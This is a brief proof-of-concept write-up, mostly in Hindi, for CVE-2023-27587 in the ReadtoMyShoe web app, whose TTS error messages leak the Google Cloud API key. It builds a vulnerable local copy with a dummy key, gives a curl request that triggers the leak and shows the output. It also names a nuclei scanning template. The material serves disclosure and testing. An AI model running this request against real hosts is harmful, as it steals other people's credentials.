
The simple PoC of CVE-2023-27587
CVE-2023-27587 का सरल PoC
ReadtoMyShoe (RTMS) एक वेब एप्लिकेशन (rust, yew और axum) है जो आपको लेख अपलोड करने (URL के माध्यम से या सीधे पेस्ट करके) और बाद में उन्हें सुनने की अनुमति देता है।
यदि लेख जोड़ते समय कोई त्रुटि होती है, तो वेबसाइट उपयोगकर्ता को एक त्रुटि संदेश दिखाती है। यदि त्रुटि Google Cloud TTS अनुरोध से उत्पन्न होती है, तो इसमें अनुरोध का पूरा URL शामिल होगा। अनुरोध URL में Google Cloud API कुंजी होती है।
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul
कुंजी केवल तब उजागर होती है जब GPC कॉल में त्रुटि होती है!
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
-H 'Accept-Encoding: gzip, deflate' \
-H 'content-type: application/json' \
--data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'
TTS failed: TTS request failed
Caused by:
HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml
$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587